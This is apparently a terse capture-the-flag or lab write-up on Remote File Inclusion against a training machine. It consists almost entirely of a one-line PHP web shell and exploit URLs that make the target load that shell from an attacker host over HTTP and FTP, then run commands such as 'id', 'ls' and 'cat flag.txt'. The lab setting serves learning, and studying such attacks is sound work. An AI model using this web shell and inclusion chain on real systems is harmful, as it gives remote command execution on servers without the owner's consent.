Remote File Inclusion (RFI)
April 21, 2024
http://10.129.29.114/index.php?language=http://127.0.0.1/index.php
<?php system($_GET["cmd"]); ?>
http://10.129.29.114/index.php?language=http://10.10.15.2:8000/cmd-webshell.php&cmd=id
http://10.129.29.114/index.php?language=http://10.10.15.2:8000/cmd-webshell.php&cmd=cd /; ls
http://10.129.29.114/index.php?language=http://10.10.15.2:8000/cmd-webshell.php&cmd=cd /exercise; ls
http://10.129.29.114/index.php?language=http://10.10.15.2:8000/cmd-webshell.php&cmd=cd /exercise; cat flag.txt
The second way is through ftp
http://10.129.29.114/index.php?language=ftp://10.10.15.2/cmd-webshell.php&cmd=id
Last updated